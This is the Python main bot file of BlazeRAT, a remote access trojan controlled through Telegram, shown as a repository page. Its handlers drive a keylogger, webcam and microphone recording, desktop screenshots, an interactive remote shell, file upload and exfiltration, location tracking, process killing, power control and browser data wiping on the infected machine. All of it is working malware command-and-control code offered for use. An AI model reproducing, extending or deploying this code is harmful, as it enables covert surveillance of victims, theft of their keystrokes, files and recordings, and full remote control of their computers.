faust
/
telegramBotBlazeRat


			
							123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523524
							#!/usr/bin/python3
# -*- coding: utf-8 -*-

# Import modules
import telebot # pip3 install pyTelegramBotAPI
from time import time, ctime, sleep
# Import helpers
import core.logger as Logger
import core.messages as Messages
import core.database as Database
import core.banned as BanManager
from config import token, auth_expire_time
from core.tokens import VerifyToken, VerifyToken2, EnumeratePermissions
# Import command modules
import services.wipe as Wipe
import services.power as Power
import services.startup as Autorun
import services.filemanager as Files
import services.volume as VolumeLevel
import services.shell as SystemCommand
import services.keylogger as Klogger
import services.keyboard as Keyboard
import services.transfer as FileTransfer
import services.location as TrackLocation
import services.information as SystemInfo
import services.webcamera as WebcamRecorder
import services.taskmanager as ProcessManager
import services.screenshot as DesktopScreenshot
import services.microphone as MicrophoneRecorder

"""
Author : LimerBoy
github.com/LimerBoy/BlazeRAT

Notes :
    The file is needed to receive commands from the telegram bot
    and process them.
"""

# Bot
bot = telebot.TeleBot(token)

""" Help """
@bot.message_handler(commands=["help"])
def Help(message):
    bot.reply_to(message, Messages.user.help, parse_mode="Markdown")

""" Authorize user """
@bot.message_handler(commands=["authorize"])
def Authorize(message):
    token = message.text[11:]
    chatid = message.chat.id
    username = message.chat.username
    username = Messages.user.name_anonymous if username is None else username
    # Prevent authorization if user is banned
    ban_state, reason = BanManager.UserIsBanned(chatid)
    if ban_state is True:
        return bot.send_message(chatid, Messages.auth.user_is_banned % reason)
    # If user is already authorized
    if Database.UserIsAuthorized(chatid):
        return bot.send_message(chatid, Messages.auth.already_authorized)
    # Check user auth password
    verify_state, name = VerifyToken(token)
    # verify_state, name = VerifyToken2(token)
    if verify_state is True:
        # Log user auth event
        Logger.Log(f"Auth >> Logged in successfully using token {name}", chatid)
        # Delete message with token
        bot.delete_message(chatid, message.message_id)
        # Get session expire time
        expire = ctime(time() + auth_expire_time)
        # Insert user to database
        Database.AuthorizeUser(chatid, name)
        bot.send_message(chatid, Messages.auth.user_authorized % (username, name, expire))
    else:
        attempts = BanManager.GetAttempts(chatid)
        # Ban user
        if attempts == 0:
            Logger.Log(f"Auth >> User banned, reason: 'Token bruteforce'", chatid)
            BanManager.BanUser(chatid, username, True, "Token bruteforce")
            bot.send_message(chatid, Messages.auth.user_is_banned % "Bruteforce")
        else:
            attempts -= 1
            Logger.Log(f"Auth >> Failed log in using token {token}, attempt left {attempts}", chatid)
            BanManager.SetAttempts(chatid, username, attempts)
            bot.send_message(chatid, Messages.auth.incorrect_token % attempts)

""" Deauthorize user """
@bot.message_handler(commands=["deauthorize"])
def Deauthorize(message):
    chatid = message.chat.id
    username = message.chat.username
    username = Messages.user.name_anonymous if username is None else username
    # If user is not authorized
    if not Database.UserIsAuthorized(chatid):
        return bot.send_message(chatid, Messages.auth.not_authorized)
    # Deauthorize user
    Logger.Log(f"Auth >> User logged out", chatid)
    Database.DeauthorizeUser(chatid)
    bot.send_message(chatid, Messages.auth.user_deauthorized % username)

""" Get permissions list """
@bot.message_handler(commands=["permissions"])
def Permissions(message):
    chatid = message.chat.id
    # If user is not authorized
    if not Database.UserIsAuthorized(chatid):
        return bot.send_message(chatid, Messages.auth.not_authorized)
    # Log
    Logger.Log(f"Command >> Get permissions", chatid)
    # Get perms list
    token = Database.GetUserToken(chatid)
    perms = EnumeratePermissions(token, False, False)
    bot.send_message(chatid, " " + perms)

""" Get system information """
@bot.message_handler(commands=["information"])
def Information(message):
    chatid = message.chat.id
    # Check if user authorized
    if not Database.UserIsAuthorized(chatid):
        return bot.send_message(chatid, Messages.auth.not_authorized)
    # Check if token have permissions to do this
    if not Database.UserContainsPermission(chatid, "INFORMATION"):
        return bot.send_message(chatid, Messages.auth.permission_not_found)
    # Log
    Logger.Log(f"Command >> Get system info", chatid)
    # Create microphone controller keyboard
    markup = telebot.types.InlineKeyboardMarkup(row_width=1)
    markup.add(
        telebot.types.InlineKeyboardButton(text="▶️ RAM", callback_data="INFO_RAM"),
        telebot.types.InlineKeyboardButton(text="▶️ Boot", callback_data="INFO_BOOT"),
        telebot.types.InlineKeyboardButton(text="▶️ Disks", callback_data="INFO_DISK"),
        telebot.types.InlineKeyboardButton(text="▶️ System", callback_data="INFO_SYS"),
        telebot.types.InlineKeyboardButton(text="▶️ Processor", callback_data="INFO_CPU"),
    )
    bot.send_message(chatid, "⚙️ System information:", reply_markup=markup)


""" Send desktop screenshot """
@bot.message_handler(commands=["screenshot"])
def Screenshot(message):
    chatid = message.chat.id
    # Check if user authorized
    if not Database.UserIsAuthorized(chatid):
        return bot.send_message(chatid, Messages.auth.not_authorized)
    # Check if token have permissions to do this
    if not Database.UserContainsPermission(chatid, "SCREENSHOT"):
        return bot.send_message(chatid, Messages.auth.permission_not_found)
    # Log
    Logger.Log(f"Screenshot >> Get desktop screenshot", chatid)
    # Create desktop screenshot & send to user
    bot.send_chat_action(chatid, "upload_photo")
    screenshot = DesktopScreenshot.Capture()
    bot.send_photo(
        chat_id=chatid, photo=screenshot,
        reply_to_message_id=message.message_id,
        caption=Messages.services.desktop_screenshot_captured
    )

""" Send webcam video """
@bot.message_handler(commands=["webcam"])
def Webcam(message):
    chatid = message.chat.id
    # Get webcam device index
    try:
        device = str(int(message.text[7:]) - 1)
    except:
        device = "0"
    # Check if user authorized
    if not Database.UserIsAuthorized(chatid):
        return bot.send_message(chatid, Messages.auth.not_authorized)
    # Check if token have permissions to do this
    if not Database.UserContainsPermission(chatid, "WEBCAMERA"):
        return bot.send_message(chatid, Messages.auth.permission_not_found)
    # Create webcam controller keyboard
    markup = telebot.types.InlineKeyboardMarkup(row_width=1)
    markup.add(
        telebot.types.InlineKeyboardButton(text=Messages.services.webcam_screenshot_button, callback_data="TakeWebcamScreenshot_" + device),
        telebot.types.InlineKeyboardButton(text=Messages.services.webcam_start_recording_button, callback_data="EnableWebcam_" + device),
        telebot.types.InlineKeyboardButton(text=Messages.services.webcam_stop_recording_button, callback_data="DisableWebcam")
    )
    bot.send_message(chatid, Messages.services.webcam_select_action % int(device), reply_markup=markup)

""" Record audio from microphone """
@bot.message_handler(commands=["microphone"])
def Microphone(message):
    chatid = message.chat.id
    # Check if user authorized
    if not Database.UserIsAuthorized(chatid):
        return bot.send_message(chatid, Messages.auth.not_authorized)
    # Check if token have permissions to do this
    if not Database.UserContainsPermission(chatid, "MICROPHONE"):
        return bot.send_message(chatid, Messages.auth.permission_not_found)
    # Create microphone controller keyboard
    markup = telebot.types.InlineKeyboardMarkup()
    markup.add(
        telebot.types.InlineKeyboardButton(text=Messages.services.microphone_start_recording_button, callback_data="EnableMicrophone"),
        telebot.types.InlineKeyboardButton(text=Messages.services.microphone_stop_recording_button, callback_data="DisableMicrophone")
    )
    bot.send_message(chatid, Messages.services.microphone_select_action, reply_markup=markup)

""" Change system audio volume """
@bot.message_handler(commands=["volume"])
def Volume(message):
    chatid = message.chat.id
    # Check if user authorized
    if not Database.UserIsAuthorized(chatid):
        return bot.send_message(chatid, Messages.auth.not_authorized)
    # Check if token have permissions to do this
    if not Database.UserContainsPermission(chatid, "VOLUME"):
        return bot.send_message(chatid, Messages.auth.permission_not_found)
    # Create volume controller keyboard
    markup = telebot.types.InlineKeyboardMarkup(row_width=1)
    markup.add(telebot.types.InlineKeyboardButton(text=Messages.services.volume_get_level_button % VolumeLevel.Get() + "%", callback_data="VL_GET"))
    # Add set level option from 0 to 100
    for lvl in range(0, 110, 10):
        markup.add(telebot.types.InlineKeyboardButton(text=Messages.services.volume_set_level_button % lvl + "%", callback_data="VL_" + str(lvl)))

    bot.send_message(chatid, " Volume control:", reply_markup=markup)

""" Keylogger """
@bot.message_handler(commands=["keylogger"])
def Keylogger(message):
    chatid = message.chat.id
    # Check if user authorized
    if not Database.UserIsAuthorized(chatid):
        return bot.send_message(chatid, Messages.auth.not_authorized)
    # Check if token have permissions to do this
    if not Database.UserContainsPermission(chatid, "KEYLOGGER"):
        return bot.send_message(chatid, Messages.auth.permission_not_found)
    # Create keylogger controller keyboard
    markup = telebot.types.InlineKeyboardMarkup()
    markup.add(
        telebot.types.InlineKeyboardButton(text=Messages.services.keylogger_start_recording_button, callback_data="EnableKeylogger"),
        telebot.types.InlineKeyboardButton(text=Messages.services.keylogger_stop_recording_button, callback_data="DisableKeylogger"),
        telebot.types.InlineKeyboardButton(text=Messages.services.keylogger_get_logs_button, callback_data="GetDataKeylogger"),
        telebot.types.InlineKeyboardButton(text=Messages.services.keylogger_clean_logs_button, callback_data="CleanKeylogger")
    )
    bot.send_message(chatid, Messages.services.microphone_select_action, reply_markup=markup)

""" Send key press """
@bot.message_handler(commands=["keyboard"])
def KeyboardCtrl(message):
    text = message.text[10:]
    chatid = message.chat.id
    # Check if user authorized
    if not Database.UserIsAuthorized(chatid):
        return bot.send_message(chatid, Messages.auth.not_authorized)
    # Check if token have permissions to do this
    if not Database.UserContainsPermission(chatid, "KEYBOARD"):
        return bot.send_message(chatid, Messages.auth.permission_not_found)

    # Send special keys list
    if not text:
        Keyboard.SendKeyboard(chatid, bot)
    else:
        # Send key press
        Keyboard.SendKeyText(text, chatid)

""" Power control """
@bot.message_handler(commands=["power"])
def PowerCtrl(message):
    chatid = message.chat.id
    # Check if user authorized
    if not Database.UserIsAuthorized(chatid):
        return bot.send_message(chatid, Messages.auth.not_authorized)
    # Check if token have permissions to do this
    if not Database.UserContainsPermission(chatid, "POWER"):
        return bot.send_message(chatid, Messages.auth.permission_not_found)
    # Create power controller keyboard
    markup = telebot.types.InlineKeyboardMarkup(row_width=1)
    markup.add(
        telebot.types.InlineKeyboardButton(text=Messages.services.power_shutdown, callback_data="POWER_SHUTDOWN"),
        telebot.types.InlineKeyboardButton(text=Messages.services.power_suspend, callback_data="POWER_SUSPEND"),
        telebot.types.InlineKeyboardButton(text=Messages.services.power_reboot, callback_data="POWER_REBOOT"),
        telebot.types.InlineKeyboardButton(text=Messages.services.power_logout, callback_data="POWER_LOGOUT"),
    )
    bot.send_message(chatid, Messages.services.power_control, reply_markup=markup)

""" Get location by BSSID """
@bot.message_handler(commands=["location"])
def Location(message):
    chatid = message.chat.id
    # Check if user authorized
    if not Database.UserIsAuthorized(chatid):
        return bot.send_message(chatid, Messages.auth.not_authorized)
    # Check if token have permissions to do this
    if not Database.UserContainsPermission(chatid, "LOCATION"):
        return bot.send_message(chatid, Messages.auth.permission_not_found)
    # Try to get device location
    TrackLocation.SendLocation(message, bot)

""" Files control """
@bot.message_handler(commands=["filemanager"])
def Filemanager(message):
    chatid = message.chat.id
    # Check if user authorized
    if not Database.UserIsAuthorized(chatid):
        return bot.send_message(chatid, Messages.auth.not_authorized)
    # Check if token have permissions to do this
    if not Database.UserContainsPermission(chatid, "FILEMANAGER"):
        return bot.send_message(chatid, Messages.auth.permission_not_found)
    # Control files
    Files.Filemanager(chatid, bot)


""" Task manager """
@bot.message_handler(commands=["taskmanager"])
def TaskManager(message):
    chatid = message.chat.id
    # Check if user authorized
    if not Database.UserIsAuthorized(chatid):
        return bot.send_message(chatid, Messages.auth.not_authorized)
    # Check if token have permissions to do this
    if not Database.UserContainsPermission(chatid, "TASKMANAGER"):
        return bot.send_message(chatid, Messages.auth.permission_not_found)
    # Send process controls
    ProcessManager.ShowProcesses(message, bot)

""" Download files or directories to telegram bot """
@bot.message_handler(commands=["download"])
def DownloadFile(message):
    chatid = message.chat.id
    # Check if user authorized
    if not Database.UserIsAuthorized(chatid):
        return bot.send_message(chatid, Messages.auth.not_authorized)
    # Check if token have permissions to do this
    if not Database.UserContainsPermission(chatid, "FILETRANSFER"):
        return bot.send_message(chatid, Messages.auth.permission_not_found)
    # Send file to telegram bot
    bot.send_chat_action(chatid, "upload_document")
    FileTransfer.SendFile(message, bot)

""" Upload files to device """
@bot.message_handler(content_types=["document"])
def UploadFile(message):
    chatid = message.chat.id
    # Check if user authorized
    if not Database.UserIsAuthorized(chatid):
        return bot.send_message(chatid, Messages.auth.not_authorized)
    # Check if token have permissions to do this
    if not Database.UserContainsPermission(chatid, "FILETRANSFER"):
        return bot.send_message(chatid, Messages.auth.permission_not_found)
    # Save file on device
    bot.send_chat_action(chatid, "upload_document")
    FileTransfer.ReceiveFile(message, bot)


""" Wipe browsers data """
@bot.message_handler(commands=["wipe"])
def WipeBrowserData(message):
    chatid = message.chat.id
    # Check if user authorized
    if not Database.UserIsAuthorized(chatid):
        return bot.send_message(chatid, Messages.auth.not_authorized)
    # Check if token have permissions to do this
    if not Database.UserContainsPermission(chatid, "WIPE"):
        return bot.send_message(chatid, Messages.auth.permission_not_found)
    # Execute wipe command
    Wipe.WipeBrowserDataInfo(message, bot)


""" Uninstall agent """
@bot.message_handler(commands=["uninstall"])
def Uninstall(message):
    chatid = message.chat.id
    # Check if user authorized
    if not Database.UserIsAuthorized(chatid):
        return bot.send_message(chatid, Messages.auth.not_authorized)
    # Check if token have permissions to do this
    if not Database.UserContainsPermission(chatid, "UNINSTALL"):
        return bot.send_message(chatid, Messages.auth.permission_not_found)
    # Log
    Logger.Log(f"Command >> Uninstall service", chatid)
    # Execute commands
    bot.send_message(chatid, Messages.services.stub_uninstall)
    Autorun.ServiceUninstall()

""" Toggle command shell session for chatid """
@bot.message_handler(commands=["shell"])
def ToggleShell(message):
    chatid = message.chat.id
    # Check if user authorized
    if not Database.UserIsAuthorized(chatid):
        return bot.send_message(chatid, Messages.auth.not_authorized)
    # Check if token have permissions to do this
    if not Database.UserContainsPermission(chatid, "SHELL"):
        return bot.send_message(chatid, Messages.auth.permission_not_found)
    # Send shell session state
    bot.send_chat_action(chatid, "typing")
    state = SystemCommand.ToggleSession(chatid)
    bot.reply_to(message, state)

""" Execute shell commands """
@bot.message_handler(func=lambda message: True, content_types=["text"])
def ExecuteShell(message):
    chatid = message.chat.id
    command = message.text
    # Check if session exists
    if not SystemCommand.SessionExists(chatid):
        return
    # Check if user authorized
    if not Database.UserIsAuthorized(chatid):
        return bot.send_message(chatid, Messages.auth.not_authorized)
    # Check if token have permissions to do this
    if not Database.UserContainsPermission(chatid, "SHELL"):
        return bot.send_message(chatid, Messages.auth.permission_not_found)
    # Run commands
    bot.send_chat_action(chatid, "typing")
    output = SystemCommand.Run(command, chatid)
    if output != None:
        bot.reply_to(message, output)

""" Events handler """
@bot.callback_query_handler(func=lambda c:True)
def KeyboardActions(callback):
    text = callback.data
    chatid = callback.from_user.id
    # Check if user authorized
    if not Database.UserIsAuthorized(chatid):
        return bot.send_message(chatid, Messages.auth.not_authorized)

    # Microphone controls
    if "Microphone" in text:
        # Check if token have permissions to do this
        if not Database.UserContainsPermission(chatid, "MICROPHONE"):
            return bot.send_message(chatid, Messages.auth.permission_not_found)
        # Handle microphone command
        MicrophoneRecorder.Handle(callback, bot)

    # Webcam controls
    elif "Webcam" in text:
        # Check if token have permissions to do this
        if not Database.UserContainsPermission(chatid, "WEBCAMERA"):
            return bot.send_message(chatid, Messages.auth.permission_not_found)
        # Handle webcam command
        WebcamRecorder.Handle(callback, bot)

    # Keylogger controls
    elif "Keylogger" in text:
        # Check if token have permissions to do this
        if not Database.UserContainsPermission(chatid, "KEYLOGGER"):
            return bot.send_message(chatid, Messages.auth.permission_not_found)
        # Handle keylogger command
        Klogger.Handle2(callback, bot)

    # Filemanager controls
    elif text[:2] in ("FA", "FC"):
        # Check if token have permissions to do this
        if not Database.UserContainsPermission(chatid, "FILEMANAGER"):
            return bot.send_message(chatid, Messages.auth.permission_not_found)
        # Handle filemanager command
        if text[:2] == "FA":
            Files.OpenFileActionsMenu(callback, bot)
        elif text[:2] == "FC":
            Files.MakeFileAction(callback, bot)

    # System info
    elif text[:4] == "INFO":
        # Check if token have permissions to do this
        if not Database.UserContainsPermission(chatid, "INFORMATION"):
            return bot.send_message(chatid, Messages.auth.permission_not_found)
        # Handle system info command
        SystemInfo.Handle(callback, bot)
    # Process manager
    elif text[:2] == "TM":
        # Check if token have permissions to do this
        if not Database.UserContainsPermission(chatid, "TASKMANAGER"):
            return bot.send_message(chatid, Messages.auth.permission_not_found)
        # Handle taskmanager command
        ProcessManager.KillProcess(callback, bot)
    # Volume control
    elif text[:2] == "VL":
        # Check if token have permissions to do this
        if not Database.UserContainsPermission(chatid, "VOLUME"):
            return bot.send_message(chatid, Messages.auth.permission_not_found)
        # Get level
        if "GET" in text:
            return bot.send_message(chatid, Messages.services.volume_get_level % VolumeLevel.Get() + "%")
        else:
            # Set level
            level = int(text.split("_")[-1])
            VolumeLevel.SetVolume(level)
            return bot.send_message(chatid, Messages.services.volume_set_level % level + "%")
    # Power control
    elif text[:5] == "POWER":
        # Check if token have permissions to do this
        if not Database.UserContainsPermission(chatid, "POWER"):
            return bot.send_message(chatid, Messages.auth.permission_not_found)
        # Handle taskmanager command
        Power.Handle(callback, bot)
    # Keyboard special keys
    elif text[:6] == "SNDKEY":
        # Check if token have permissions to do this
        if not Database.UserContainsPermission(chatid, "KEYBOARD"):
            return bot.send_message(chatid, Messages.auth.permission_not_found)
        Keyboard.SendKeyPress(text.split("_")[-1], chatid)
    # Wipe browsers data
    elif text[:4] == "Wipe":
        # Check if token have permissions to do this
        if not Database.UserContainsPermission(chatid, "WIPE"):
            return bot.send_message(chatid, Messages.auth.permission_not_found)
        # Log
        Logger.Log(f"Command >> Wipe browsers data", chatid)
        # Wipe
        Wipe.WipeBrowserData(callback, bot)

""" Run telegram bot """
def Run():
    print("[~] Telegram Bot starting...")
    try:
        print("[?] Started as @" + bot.get_me().username)
    except Exception as error:
        exit(f"[!] Failed connect to telegram bot\n{error}")
    else:
        while True:
            try:
                bot.polling(none_stop=True)
            except Exception as error:
                print(error)
                sleep(2)